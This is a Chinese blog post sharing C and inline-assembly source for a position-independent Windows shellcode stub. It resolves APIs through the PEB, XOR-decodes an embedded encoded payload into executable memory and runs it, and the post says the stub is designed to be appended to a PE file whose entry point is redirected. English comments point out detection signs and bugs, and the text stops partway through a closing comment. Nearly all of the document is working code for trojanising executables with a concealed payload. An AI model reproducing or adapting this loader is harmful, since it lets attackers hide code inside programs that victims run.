简介:
之前写的代码,开下源。相当于shellcode里面套了一段解密shellcode,可以贴在PE文件后面,改入口点,最后执行完成以后再跳回来。最主要的还是要学习一下,shellcode框架怎么写,怎么地址无关,怎么随心所欲的调自己想要的API。这个知道了,就可以随便写shellcode了,但是注意shellcode中字符串的初始化格式,都是以字符数组的格式保存,这样才能地址无关!!!!!下面看代码就行,希望对大家有所帮助。
#include <Windows.h>
/* Hand-rolled replacement for GetProcAddress: walks the export table of the
 * module at hMoudleBase and returns the address of its "GetProcAddress"
 * export, or NULL.  Defined after main() below.  (The triple "s" and the
 * leading underscore + capital, a reserved identifier in C, are the author's.) */
FARPROC _GetProcAddresss(HMODULE hMoudleBase);
/*
 * Loader stub.  Everything it needs is resolved at run time (kernel32 base
 * from the PEB, GetProcAddress from kernel32's export table, the three
 * Virtual* APIs through that), and every string is a local char array, so
 * the compiled function carries no relocations and no import references and
 * can be appended to another image as-is (see the post's introduction).
 *
 * Review notes (behaviour, detection, defects):
 *  - The PEB walk and the read-write -> execute flip on a fresh private
 *    allocation are the two behaviours that do not occur in ordinary
 *    compiler-generated code; both are standard detection points.
 *  - Return values of VirtualAlloc and VirtualProtect are never checked; a
 *    NULL allocation faults in the decode loop.
 *  - VirtualFree is called with MEM_RELEASE and a non-zero dwSize, which the
 *    API contract rejects, so the call fails and the buffer stays mapped.
 *  - 0x11111111 at the end is a placeholder the author patches with the
 *    host's original entry point; as written it is not a valid target.
 *  - 32-bit only: fs:[0x30] and the DWORD-sized offsets assume x86.
 */
int main()
{
HMODULE h_kernel32 = NULL;
/* Locate kernel32 without an import.  On 32-bit Windows fs:[0x30] is the
 * PEB; +0xC is Ldr and Ldr+0x14 is InMemoryOrderModuleList.  Two Flink hops
 * skip the executable and ntdll, and +0x10 from that entry's list links is
 * DllBase.  The third-module-is-kernel32 assumption and the structure
 * offsets are undocumented layout, not an API contract. */
__asm
{
mov eax, fs:[0x30]        ; PEB
mov eax, [eax + 0xc]      ; PEB->Ldr
mov eax, [eax + 0x14]     ; InMemoryOrderModuleList.Flink -> 1st entry (exe)
mov eax, [eax]            ; 2nd entry (ntdll)
mov eax, [eax]            ; 3rd entry (kernel32, by assumption)
mov eax, [eax + 0x10]     ; DllBase, relative to the entry's list links
mov h_kernel32, eax
}
/* Local typedefs mirror the kernel32 prototypes; the SAL __in/__out
 * annotations expand to nothing and only document direction. */
typedef FARPROC (WINAPI *FN_GetProcAddress) (
__in HMODULE hModule,
__in LPCSTR lpProcName
);
FN_GetProcAddress fn_GetProcAddress;
/* Resolved by hand from the export table; NULL is not checked, so a module
 * without the export would crash on the first call below. */
fn_GetProcAddress = (FN_GetProcAddress)_GetProcAddresss(h_kernel32);
typedef LPVOID (WINAPI* FN_VirtualAlloc)(
__in_opt LPVOID lpAddress,
__in SIZE_T dwSize,
__in DWORD flAllocationType,
__in DWORD flProtect
);
/* API names are built as char arrays so they are materialised by immediate
 * stores on the stack instead of living in .rdata (the position-independence
 * trick the post is about). */
char strVirtualAlloc[] = {'V','i','r','t','u','a','l','A','l','l','o','c','\x00'};
FN_VirtualAlloc fn_VirtualAlloc = (FN_VirtualAlloc)fn_GetProcAddress(h_kernel32,strVirtualAlloc);
typedef BOOL (WINAPI* FN_VirtualProtect)(
__in LPVOID lpAddress,
__in SIZE_T dwSize,
__in DWORD flNewProtect,
__out PDWORD lpflOldProtect
);
char strVirtualProtect[] = {'V','i','r','t','u','a','l','P','r','o','t','e','c','t','\x00'};
FN_VirtualProtect fn_VirtualProtect = (FN_VirtualProtect)fn_GetProcAddress(h_kernel32,strVirtualProtect);
typedef BOOL (WINAPI* FN_VirtualFree)(
__in LPVOID lpAddress,
__in SIZE_T dwSize,
__in DWORD dwFreeType
);
char strVirtualFree[] = {'V','i','r','t','u','a','l','F','r','e','e','\x00'};
FN_VirtualFree fn_VirtualFree = (FN_VirtualFree)fn_GetProcAddress(h_kernel32,strVirtualFree);
/* Second-stage payload, 2287 bytes, stored XOR 0x55 (decoded below).  Its
 * contents are not analysed here.  Note for reviewers: a single-byte XOR key
 * leaks structure -- every 0x55 in this table is a 0x00 in the plaintext, so
 * the long 0x55 runs mark zero padding / small little-endian constants. */
unsigned char hexData_1[2287] = {
0xD4, 0xB9, 0x79, 0x54, 0x55, 0x55, 0x06, 0x00, 0x03, 0x02, 0x92, 0x11, 0x71, 0x41, 0x55, 0x55,
0x55, 0x55, 0x31, 0xF4, 0x65, 0x55, 0x55, 0x55, 0xDE, 0x15, 0x59, 0xDE, 0x15, 0x41, 0xDE, 0x55,
0xDE, 0x55, 0xDE, 0x15, 0x45, 0xDC, 0x11, 0x71, 0x41, 0xDE, 0x01, 0x71, 0x41, 0xBD, 0x5B, 0x5D,
0x55, 0x55, 0xDE, 0xA5, 0xE5, 0x19, 0xDD, 0xD1, 0x71, 0xC9, 0x55, 0x55, 0x55, 0xDD, 0xD1, 0x71,
0xF5, 0x55, 0x55, 0x55, 0xD8, 0xD1, 0x71, 0xC9, 0x55, 0x55, 0x55, 0x05, 0x07, 0x93, 0xD1, 0x71,
0xF0, 0x55, 0x55, 0x55, 0x3A, 0x93, 0xD1, 0x71, 0xF3, 0x55, 0x55, 0x55, 0x34, 0x93, 0xD1, 0x71,
0xF2, 0x55, 0x55, 0x55, 0x31, 0x93, 0xD1, 0x71, 0xFC, 0x55, 0x55, 0x55, 0x3C, 0x93, 0xD1, 0x71,
0xFF, 0x55, 0x55, 0x55, 0x37, 0x93, 0xD1, 0x71, 0xFE, 0x55, 0x55, 0x55, 0x27, 0x93, 0xD1, 0x71,
0xF9, 0x55, 0x55, 0x55, 0x34, 0x93, 0xD1, 0x71, 0xF8, 0x55, 0x55, 0x55, 0x27, 0x93, 0xD1, 0x71,
0xFB, 0x55, 0x55, 0x55, 0x2C, 0x93, 0xD1, 0x71, 0xFA, 0x55, 0x55, 0x55, 0x14, 0x93, 0xD1, 0x71,
0xE5, 0x55, 0x55, 0x55, 0x55, 0xAA, 0x83, 0xD8, 0x19, 0x71, 0x19, 0xDE, 0xBD, 0xE6, 0x30, 0x04,
0xDC, 0xF9, 0x71, 0x7D, 0x54, 0x55, 0x55, 0x93, 0x11, 0x71, 0x05, 0x20, 0x93, 0x11, 0x71, 0x04,
0x26, 0xDD, 0x09, 0x71, 0x07, 0x93, 0x11, 0x71, 0x06, 0x27, 0x93, 0x11, 0x71, 0x01, 0x66, 0x93,
0x11, 0x71, 0x00, 0x67, 0x93, 0x11, 0x71, 0x03, 0x7B, 0x93, 0x11, 0x71, 0x02, 0x31, 0x93, 0x11,
0x71, 0x0D, 0x39, 0x93, 0x11, 0x71, 0x0C, 0x39, 0x93, 0x11, 0x71, 0x0F, 0x55, 0xAA, 0x80, 0xD8,
0xC1, 0x71, 0xC5, 0x55, 0x55, 0x55, 0x07, 0x93, 0xD1, 0x71, 0xC1, 0x55, 0x55, 0x55, 0x22, 0x93,
0xD1, 0x71, 0xC0, 0x55, 0x55, 0x55, 0x3C, 0x93, 0xD1, 0x71, 0xC3, 0x55, 0x55, 0x55, 0x3B, 0x93,
0xD1, 0x71, 0xC2, 0x55, 0x55, 0x55, 0x3C, 0x93, 0xD1, 0x71, 0xCD, 0x55, 0x55, 0x55, 0x3B, 0xDD,
0xC9, 0x71, 0xCC, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xCF, 0x55, 0x55, 0x55, 0x21, 0x93, 0xD1,
0x71, 0xCE, 0x55, 0x55, 0x55, 0x7B, 0x93, 0xD1, 0x71, 0xC9, 0x55, 0x55, 0x55, 0x31, 0x93, 0xD1,
0x71, 0xC8, 0x55, 0x55, 0x55, 0x39, 0x93, 0xD1, 0x71, 0xCB, 0x55, 0x55, 0x55, 0x39, 0x93, 0xD1,
0x71, 0xCA, 0x55, 0x55, 0x55, 0x55, 0xAA, 0x80, 0xDE, 0xAD, 0xD8, 0xD1, 0x71, 0xF9, 0x55, 0x55,
0x55, 0x05, 0x02, 0x93, 0xD1, 0x71, 0xE1, 0x55, 0x55, 0x55, 0x1C, 0x93, 0xD1, 0x71, 0xE0, 0x55,
0x55, 0x55, 0x3B, 0x93, 0xD1, 0x71, 0xE3, 0x55, 0x55, 0x55, 0x21, 0xDD, 0xC9, 0x71, 0xE2, 0x55,
0x55, 0x55, 0x93, 0xD1, 0x71, 0xED, 0x55, 0x55, 0x55, 0x27, 0x93, 0xD1, 0x71, 0xEC, 0x55, 0x55,
0x55, 0x3B, 0xDD, 0xC9, 0x71, 0xEF, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xEE, 0x55, 0x55, 0x55,
0x21, 0x93, 0xD1, 0x71, 0xE9, 0x55, 0x55, 0x55, 0x1A, 0x93, 0xD1, 0x71, 0xE8, 0x55, 0x55, 0x55,
0x25, 0xDD, 0xC9, 0x71, 0xEB, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xEA, 0x55, 0x55, 0x55, 0x3B,
0x93, 0xD1, 0x71, 0x95, 0x55, 0x55, 0x55, 0x14, 0x93, 0xD1, 0x71, 0x94, 0x55, 0x55, 0x55, 0x55,
0xAA, 0x83, 0xDC, 0xD1, 0x71, 0xDD, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xE9, 0x55, 0x55, 0x55,
0x1C, 0x93, 0xD1, 0x71, 0xE8, 0x55, 0x55, 0x55, 0x3B, 0xD8, 0xD9, 0x71, 0xE9, 0x55, 0x55, 0x55,
0x04, 0x02, 0x93, 0xD1, 0x71, 0x93, 0x55, 0x55, 0x55, 0x21, 0xDD, 0xC9, 0x71, 0x92, 0x55, 0x55,
0x55, 0x93, 0xD1, 0x71, 0x9D, 0x55, 0x55, 0x55, 0x27, 0x93, 0xD1, 0x71, 0x9C, 0x55, 0x55, 0x55,
0x3B, 0xDD, 0xC9, 0x71, 0x9F, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0x9E, 0x55, 0x55, 0x55, 0x21,
0x93, 0xD1, 0x71, 0x99, 0x55, 0x55, 0x55, 0x1A, 0x93, 0xD1, 0x71, 0x98, 0x55, 0x55, 0x55, 0x25,
0xDD, 0xC9, 0x71, 0x9B, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0x9A, 0x55, 0x55, 0x55, 0x3B, 0x93,
0xD1, 0x71, 0x85, 0x55, 0x55, 0x55, 0x00, 0x93, 0xD1, 0x71, 0x84, 0x55, 0x55, 0x55, 0x27, 0x93,
0xD1, 0x71, 0x87, 0x55, 0x55, 0x55, 0x39, 0x93, 0xD1, 0x71, 0x86, 0x55, 0x55, 0x55, 0x14, 0x93,
0xD1, 0x71, 0x81, 0x55, 0x55, 0x55, 0x55, 0xAA, 0x83, 0xD8, 0x01, 0x71, 0x25, 0xDC, 0xD1, 0x71,
0xD9, 0x55, 0x55, 0x55, 0xDE, 0x11, 0x71, 0x41, 0x07, 0x05, 0x93, 0x11, 0x71, 0x2D, 0x16, 0x93,
0x11, 0x71, 0x2C, 0x27, 0xDD, 0x09, 0x71, 0x2F, 0x93, 0x11, 0x71, 0x2E, 0x34, 0x93, 0x11, 0x71,
0x29, 0x21, 0xDD, 0x09, 0x71, 0x28, 0x93, 0x11, 0x71, 0x2B, 0x13, 0x93, 0x11, 0x71, 0x2A, 0x3C,
0x93, 0xD1, 0x71, 0xD5, 0x55, 0x55, 0x55, 0x39, 0xDD, 0xC9, 0x71, 0xD4, 0x55, 0x55, 0x55, 0x93,
0xD1, 0x71, 0xD7, 0x55, 0x55, 0x55, 0x14, 0x93, 0xD1, 0x71, 0xD6, 0x55, 0x55, 0x55, 0x55, 0xAA,
0x83, 0xDE, 0x01, 0x71, 0x41, 0xD8, 0x19, 0x71, 0x15, 0x04, 0x07, 0xDC, 0xD1, 0x71, 0x69, 0x54,
0x55, 0x55, 0x93, 0x11, 0x71, 0x1D, 0x02, 0x93, 0x11, 0x71, 0x1C, 0x27, 0x93, 0x11, 0x71, 0x1F,
0x3C, 0x93, 0x11, 0x71, 0x1E, 0x21, 0xDD, 0x09, 0x71, 0x19, 0x93, 0x11, 0x71, 0x18, 0x13, 0x93,
0x11, 0x71, 0x1B, 0x3C, 0x93, 0x11, 0x71, 0x1A, 0x39, 0xDD, 0x09, 0x71, 0x05, 0x93, 0x11, 0x71,
0x04, 0x55, 0xAA, 0x83, 0xDE, 0x19, 0x71, 0x41, 0xDC, 0xD1, 0x71, 0x75, 0x54, 0x55, 0x55, 0xD8,
0x11, 0x71, 0x29, 0x05, 0x04, 0x93, 0xD1, 0x71, 0xD1, 0x55, 0x55, 0x55, 0x16, 0x93, 0xD1, 0x71,
0xD0, 0x55, 0x55, 0x55, 0x39, 0x93, 0xD1, 0x71, 0xD3, 0x55, 0x55, 0x55, 0x3A, 0x93, 0xD1, 0x71,
0xD2, 0x55, 0x55, 0x55, 0x26, 0xDD, 0xC9, 0x71, 0xDD, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xDC,
0x55, 0x55, 0x55, 0x1D, 0x93, 0xD1, 0x71, 0xDF, 0x55, 0x55, 0x55, 0x34, 0x93, 0xD1, 0x71, 0xDE,
0x55, 0x55, 0x55, 0x3B, 0x93, 0xD1, 0x71, 0xD9, 0x55, 0x55, 0x55, 0x31, 0x93, 0xD1, 0x71, 0xD8,
0x55, 0x55, 0x55, 0x39, 0xDD, 0xC9, 0x71, 0xDB, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xDA, 0x55,
0x55, 0x55, 0x55, 0xAA, 0x83, 0xDC, 0xD1, 0x71, 0x79, 0x54, 0x55, 0x55, 0x93, 0x11, 0x71, 0x0D,
0x38, 0x93, 0x11, 0x71, 0x0C, 0x26, 0x93, 0x11, 0x71, 0x0F, 0x23, 0x93, 0x11, 0x71, 0x0E, 0x36,
0x93, 0x11, 0x71, 0x09, 0x27, 0x93, 0x11, 0x71, 0x08, 0x21, 0x93, 0x11, 0x71, 0x0B, 0x7B, 0x93,
0x11, 0x71, 0x0A, 0x31, 0x93, 0x11, 0x71, 0x35, 0x39, 0xD8, 0x01, 0x71, 0x0D, 0x07, 0x93, 0x11,
0x71, 0x30, 0x39, 0x93, 0x11, 0x71, 0x33, 0x55, 0xAA, 0x80, 0xDE, 0xBD, 0xD8, 0x11, 0x71, 0x71,
0x05, 0x00, 0x93, 0x11, 0x71, 0x79, 0x38, 0x93, 0x11, 0x71, 0x78, 0x34, 0x93, 0x11, 0x71, 0x7B,
0x39, 0x93, 0x11, 0x71, 0x7A, 0x39, 0x93, 0x11, 0x71, 0x65, 0x3A, 0x93, 0x11, 0x71, 0x64, 0x36,
0x93, 0x11, 0x71, 0x67, 0x55, 0xAA, 0x83, 0xD8, 0x19, 0x71, 0x79, 0x04, 0x00, 0xDC, 0x11, 0x71,
0x7D, 0x93, 0x11, 0x71, 0x61, 0x38, 0xDD, 0x09, 0x71, 0x60, 0x93, 0x11, 0x71, 0x63, 0x38, 0x93,
0x11, 0x71, 0x62, 0x26, 0xDD, 0x09, 0x71, 0x6D, 0x93, 0x11, 0x71, 0x6C, 0x21, 0x93, 0x11, 0x71,
0x6F, 0x55, 0xAA, 0x83, 0xD8, 0x01, 0x71, 0x4D, 0x07, 0x00, 0xDC, 0xD1, 0x71, 0x65, 0x54, 0x55,
0x55, 0x93, 0x11, 0x71, 0x75, 0x33, 0x93, 0x11, 0x71, 0x74, 0x27, 0xDD, 0x09, 0x71, 0x77, 0xDD,
0x09, 0x71, 0x76, 0x93, 0x11, 0x71, 0x71, 0x55, 0xAA, 0x83, 0xDC, 0xD1, 0x71, 0x6D, 0x54, 0x55,
0x55, 0xD8, 0xD1, 0x71, 0x85, 0x55, 0x55, 0x55, 0x05, 0x02, 0x93, 0xD1, 0x71, 0x8D, 0x55, 0x55,
0x55, 0x1C, 0x93, 0xD1, 0x71, 0x8C, 0x55, 0x55, 0x55, 0x3B, 0x93, 0xD1, 0x71, 0x8F, 0x55, 0x55,
0x55, 0x21, 0xDD, 0xC9, 0x71, 0x8E, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0x89, 0x55, 0x55, 0x55,
0x27, 0x93, 0xD1, 0x71, 0x88, 0x55, 0x55, 0x55, 0x3B, 0xDD, 0xC9, 0x71, 0x8B, 0x55, 0x55, 0x55,
0x93, 0xD1, 0x71, 0x8A, 0x55, 0x55, 0x55, 0x21, 0x93, 0xD1, 0x71, 0xB5, 0x55, 0x55, 0x55, 0x07,
0xDD, 0xC9, 0x71, 0xB4, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xB7, 0x55, 0x55, 0x55, 0x34, 0x93,
0xD1, 0x71, 0xB6, 0x55, 0x55, 0x55, 0x31, 0x93, 0xD1, 0x71, 0xB1, 0x55, 0x55, 0x55, 0x13, 0x93,
0xD1, 0x71, 0xB0, 0x55, 0x55, 0x55, 0x3C, 0x93, 0xD1, 0x71, 0xB3, 0x55, 0x55, 0x55, 0x39, 0xDD,
0xC9, 0x71, 0xB2, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xBD, 0x55, 0x55, 0x55, 0x55, 0xAA, 0x83,
0xDE, 0xBD, 0x93, 0xD1, 0x71, 0xB1, 0x55, 0x55, 0x55, 0x1C, 0x93, 0xD1, 0x71, 0xB0, 0x55, 0x55,
0x55, 0x3B, 0x93, 0xD1, 0x71, 0xB3, 0x55, 0x55, 0x55, 0x21, 0xDD, 0xC9, 0x71, 0xB2, 0x55, 0x55,
0x55, 0x93, 0xD1, 0x71, 0xBD, 0x55, 0x55, 0x55, 0x27, 0x93, 0xD1, 0x71, 0xBC, 0x55, 0x55, 0x55,
0x3B, 0xDD, 0xC9, 0x71, 0xBF, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xBE, 0x55, 0x55, 0x55, 0x21,
0x93, 0xD1, 0x71, 0xB9, 0x55, 0x55, 0x55, 0x16, 0x93, 0xD1, 0x71, 0xB8, 0x55, 0x55, 0x55, 0x39,
0x93, 0xD1, 0x71, 0xBB, 0x55, 0x55, 0x55, 0x3A, 0x93, 0xD1, 0x71, 0xBA, 0x55, 0x55, 0x55, 0x26,
0xDD, 0xC9, 0x71, 0xA5, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xA4, 0x55, 0x55, 0x55, 0x1D, 0x93,
0xD1, 0x71, 0xA7, 0x55, 0x55, 0x55, 0x34, 0x93, 0xD1, 0x71, 0xA6, 0x55, 0x55, 0x55, 0x3B, 0x93,
0xD1, 0x71, 0xA1, 0x55, 0x55, 0x55, 0x31, 0x93, 0xD1, 0x71, 0xA0, 0x55, 0x55, 0x55, 0x39, 0xDD,
0xC9, 0x71, 0xA3, 0x55, 0x55, 0x55, 0xD8, 0xD9, 0x71, 0xB1, 0x55, 0x55, 0x55, 0x04, 0x02, 0x93,
0xD1, 0x71, 0xAA, 0x55, 0x55, 0x55, 0x55, 0xAA, 0x83, 0x3F, 0x55, 0x3F, 0x55, 0x3F, 0x55, 0x3F,
0x55, 0xD8, 0x01, 0x71, 0x21, 0x07, 0xDC, 0xD1, 0x71, 0x65, 0x54, 0x55, 0x55, 0x93, 0x11, 0x71,
0x2D, 0x07, 0x93, 0x11, 0x71, 0x2C, 0x3A, 0x93, 0x11, 0x71, 0x2F, 0x3A, 0x93, 0x11, 0x71, 0x2E,
0x3E, 0x93, 0x11, 0x71, 0x29, 0x1C, 0x93, 0x11, 0x71, 0x28, 0x10, 0x93, 0x11, 0x71, 0x2B, 0x7A,
0x93, 0x11, 0x71, 0x2A, 0x64, 0x93, 0xD1, 0x71, 0xD5, 0x55, 0x55, 0x55, 0x7B, 0x93, 0xD1, 0x71,
0xD4, 0x55, 0x55, 0x55, 0x65, 0x93, 0xD1, 0x71, 0xD7, 0x55, 0x55, 0x55, 0x55, 0xAA, 0xC1, 0x71,
0xC9, 0x55, 0x55, 0x55, 0xDE, 0xAD, 0x93, 0x11, 0x71, 0x61, 0x21, 0xDD, 0x09, 0x71, 0x60, 0x93,
0x11, 0x71, 0x63, 0x26, 0x93, 0x11, 0x71, 0x62, 0x21, 0x93, 0x11, 0x71, 0x6D, 0x0A, 0x93, 0x11,
0x71, 0x6C, 0x64, 0x93, 0x11, 0x71, 0x6F, 0x7B, 0x93, 0x11, 0x71, 0x6E, 0x31, 0x93, 0x11, 0x71,
0x69, 0x39, 0x93, 0x11, 0x71, 0x68, 0x39, 0x93, 0x11, 0x71, 0x6B, 0x55, 0xD0, 0xAA, 0x5A, 0xD1,
0xA7, 0x54, 0x55, 0x55, 0x3F, 0x55, 0x3D, 0x55, 0x55, 0x55, 0x51, 0xE5, 0x3D, 0x3F, 0x55, 0xDD,
0xD1, 0x71, 0x51, 0x54, 0x55, 0x55, 0xDD, 0xD1, 0x71, 0x45, 0x54, 0x55, 0x55, 0x3F, 0x55, 0xD8,
0xD1, 0x71, 0x5D, 0x54, 0x55, 0x55, 0x05, 0x02, 0x93, 0xD1, 0x71, 0x44, 0x54, 0x55, 0x55, 0x21,
0x93, 0xD1, 0x71, 0x47, 0x54, 0x55, 0x55, 0x21, 0x93, 0xD1, 0x71, 0x46, 0x54, 0x55, 0x55, 0x25,
0x93, 0xD1, 0x71, 0x41, 0x54, 0x55, 0x55, 0x6F, 0x93, 0xD1, 0x71, 0x40, 0x54, 0x55, 0x55, 0x7A,
0x93, 0xD1, 0x71, 0x43, 0x54, 0x55, 0x55, 0x7A, 0x93, 0xD1, 0x71, 0x42, 0x54, 0x55, 0x55, 0x22,
0x93, 0xD1, 0x71, 0x4D, 0x54, 0x55, 0x55, 0x22, 0x93, 0xD1, 0x71, 0x4C, 0x54, 0x55, 0x55, 0x22,
0x93, 0xD1, 0x71, 0x4F, 0x54, 0x55, 0x55, 0x7B, 0x93, 0xD1, 0x71, 0x4E, 0x54, 0x55, 0x55, 0x26,
0xDD, 0xC9, 0x71, 0x48, 0x54, 0x55, 0x55, 0x93, 0xD1, 0x71, 0x4B, 0x54, 0x55, 0x55, 0x3B, 0x93,
0xD1, 0x71, 0x4A, 0x54, 0x55, 0x55, 0x24, 0x93, 0xD1, 0x71, 0x75, 0x54, 0x55, 0x55, 0x3C, 0x93,
0xD1, 0x71, 0x74, 0x54, 0x55, 0x55, 0x37, 0x93, 0xD1, 0x71, 0x77, 0x54, 0x55, 0x55, 0x37, 0x93,
0xD1, 0x71, 0x76, 0x54, 0x55, 0x55, 0x7B, 0x93, 0xD1, 0x71, 0x71, 0x54, 0x55, 0x55, 0x36, 0x93,
0xD1, 0x71, 0x70, 0x54, 0x55, 0x55, 0x3A, 0x93, 0xD1, 0x71, 0x73, 0x54, 0x55, 0x55, 0x38, 0x93,
0xD1, 0x71, 0x72, 0x54, 0x55, 0x55, 0x7A, 0x93, 0xD1, 0x71, 0x7D, 0x54, 0x55, 0x55, 0x21, 0xDD,
0xC9, 0x71, 0x7C, 0x54, 0x55, 0x55, 0x93, 0xD1, 0x71, 0x7F, 0x54, 0x55, 0x55, 0x26, 0x93, 0xD1,
0x71, 0x7E, 0x54, 0x55, 0x55, 0x21, 0x93, 0xD1, 0x71, 0x79, 0x54, 0x55, 0x55, 0x7B, 0x93, 0xD1,
0x71, 0x78, 0x54, 0x55, 0x55, 0x31, 0x93, 0xD1, 0x71, 0x7B, 0x54, 0x55, 0x55, 0x39, 0x93, 0xD1,
0x71, 0x7A, 0x54, 0x55, 0x55, 0x39, 0x93, 0xD1, 0x71, 0x65, 0x54, 0x55, 0x55, 0x55, 0xAA, 0xC1,
0x71, 0xF1, 0x55, 0x55, 0x55, 0xDE, 0x8D, 0xD0, 0x8E, 0x5A, 0xD1, 0xEA, 0x55, 0x55, 0x55, 0x3D,
0x55, 0x55, 0x54, 0x55, 0xAA, 0x01, 0x71, 0x71, 0x3D, 0x55, 0x55, 0x54, 0x55, 0x3F, 0x55, 0x05,
0xDC, 0x11, 0x71, 0x65, 0xAA, 0xC1, 0x71, 0x6D, 0x54, 0x55, 0x55, 0xD6, 0x91, 0x45, 0x3F, 0x55,
0x3D, 0xD5, 0x55, 0x55, 0x55, 0x3F, 0x57, 0x3F, 0x55, 0x3F, 0x55, 0x3D, 0x55, 0x55, 0x55, 0x15,
0xD8, 0x19, 0x71, 0x19, 0x04, 0x92, 0xD1, 0x71, 0xFD, 0x55, 0x55, 0x55, 0x54, 0x55, 0x55, 0x55,
0x92, 0xD1, 0x71, 0x19, 0x54, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0xAA, 0xC1, 0x71, 0x05, 0x54,
0x55, 0x55, 0xDC, 0xD1, 0x71, 0xDD, 0x55, 0x55, 0x55, 0xD0, 0x95, 0x21, 0x17, 0xDE, 0x11, 0x71,
0x75, 0xD8, 0xC1, 0x71, 0xD9, 0x55, 0x55, 0x55, 0x07, 0x3D, 0x55, 0x55, 0x54, 0x55, 0x05, 0x06,
0xAA, 0x80, 0xDE, 0xC1, 0x71, 0xD9, 0x55, 0x55, 0x55, 0xDE, 0x11, 0x71, 0x75, 0x3F, 0x55, 0xD8,
0xD9, 0x71, 0x61, 0x54, 0x55, 0x55, 0x04, 0xDE, 0xD9, 0x71, 0xC5, 0x55, 0x55, 0x55, 0x07, 0x05,
0x04, 0xAA, 0xC1, 0x71, 0x61, 0x54, 0x55, 0x55, 0xDE, 0xD1, 0x71, 0xDD, 0x55, 0x55, 0x55, 0x05,
0xAA, 0xC1, 0x71, 0x65, 0x54, 0x55, 0x55, 0xDE, 0x01, 0x71, 0x75, 0x07, 0xAA, 0xC1, 0x71, 0x69,
0x54, 0x55, 0x55, 0xD6, 0x91, 0x51, 0x06, 0xAA, 0xC1, 0x71, 0x75, 0x54, 0x55, 0x55, 0x02, 0xAA,
0xC1, 0x71, 0x75, 0x54, 0x55, 0x55, 0xD8, 0x11, 0x71, 0x61, 0x05, 0xAA, 0xC1, 0x71, 0x7D, 0x54,
0x55, 0x55, 0xD8, 0x19, 0x71, 0x45, 0x04, 0x05, 0x93, 0x11, 0x71, 0x4D, 0x27, 0x93, 0x11, 0x71,
0x4C, 0x20, 0x93, 0x11, 0x71, 0x4F, 0x3B, 0x93, 0x11, 0x71, 0x4E, 0x55, 0xAA, 0x83, 0xAA, 0x85,
0x0A, 0x0B, 0x08, 0x66, 0x95, 0x0E, 0xD4, 0x91, 0x79, 0x54, 0x55, 0x55, 0x96, 0x99, 0x99, 0x99,
0x04, 0xDE, 0x17, 0x69, 0x56, 0x97, 0xD6, 0x2D, 0x29, 0x55, 0x20, 0x51, 0x66, 0x95, 0x0C, 0x96,
0xDE, 0x1D, 0x2D, 0xD0, 0x9C, 0x21, 0xA0, 0xDE, 0x11, 0x44, 0x49, 0x06, 0xDE, 0x09, 0x44, 0x4D,
0x00, 0xDE, 0x39, 0x44, 0x71, 0x03, 0x02, 0xDE, 0x29, 0x44, 0x75, 0x66, 0xA3, 0x56, 0xAF, 0x56,
0xBF, 0x56, 0x97, 0xDC, 0x21, 0x71, 0x45, 0x1E, 0xDE, 0x59, 0xE2, 0x56, 0x9F, 0xD5, 0x6C, 0x12,
0x20, 0x1B, 0xD5, 0x2C, 0x54, 0x30, 0x20, 0x1D, 0xD5, 0x2C, 0x57, 0x21, 0x20, 0x17, 0xD5, 0x2C,
0x56, 0x05, 0x20, 0x69, 0xD5, 0x2C, 0x51, 0x27, 0x20, 0x63, 0xD5, 0x2C, 0x50, 0x3A, 0x20, 0x65,
0xD5, 0x2C, 0x53, 0x36, 0x20, 0x7F, 0xD5, 0x2C, 0x52, 0x14, 0x20, 0x71, 0xD5, 0x2C, 0x5D, 0x31,
0x20, 0x4B, 0xD5, 0x2C, 0x5C, 0x31, 0x20, 0x4D, 0xD5, 0x2C, 0x5F, 0x27, 0x20, 0x47, 0xD5, 0x2C,
0x5E, 0x30, 0x20, 0x59, 0xD5, 0x2C, 0x59, 0x26, 0x20, 0x53, 0xD5, 0x2C, 0x58, 0x26, 0x21, 0x5A,
0x13, 0x6E, 0xA6, 0x23, 0xF6, 0xDE, 0x11, 0x71, 0x45, 0x0A, 0x0B, 0x08, 0x0E, 0x0C, 0x96, 0x5A,
0xE2, 0x19, 0x20, 0x55, 0xDE, 0x51, 0xDD, 0x0A, 0x0B, 0x08, 0x56, 0x97, 0x0E, 0x0C, 0x96
};
/* 3 KiB private buffer (larger than the 2287-byte payload), committed RW.
 * The result is not checked: a NULL here faults in the loop below. */
unsigned char *hexData_2 = (unsigned char*)fn_VirtualAlloc(NULL, 3 * 1024, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
//unsigned char hexData_2[sizeof(hexData_1)];
DWORD pold;
/* Flip the buffer to RWX (return value ignored).  RW -> RWX on a private
 * allocation followed by a call into it is the classic self-decrypting
 * pattern that memory-scanning and API-monitoring defences look for. */
fn_VirtualProtect(hexData_2, 3 * 1024, PAGE_EXECUTE_READWRITE, &pold);
/* Decode in place: single-byte XOR with 0x55.  (int vs size_t comparison
 * draws a signed/unsigned warning but is harmless at 2287.) */
for (int i =0;i<sizeof(hexData_1);i++)
{
hexData_2[i] = hexData_1[i] ^ 0x55;
}
/* Transfer control to the decoded buffer; the payload is expected to
 * return here so the stub can tidy up and hand over to the host. */
__asm
{
mov eax,hexData_2
call eax
}
/* Defect: with MEM_RELEASE the API requires dwSize == 0; passing 3*1024
 * makes the call fail, so the RWX buffer stays mapped for the process
 * lifetime (a useful artefact for memory forensics). */
fn_VirtualFree(hexData_2,3 * 1024,MEM_RELEASE);
/* Placeholder: the author patches the immediate with the host PE's original
 * entry point after appending this stub, so control never comes back here. */
__asm
{
mov eax,0x11111111
jmp eax
}
return 0;   /* unreachable once the jmp above has been patched */
}
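/*
 * Resolve the address of the "GetProcAddress" export of the module mapped at
 * hMoudleBase by parsing its export directory directly, so the stub needs
 * neither an import entry nor a string literal in .rdata.
 *
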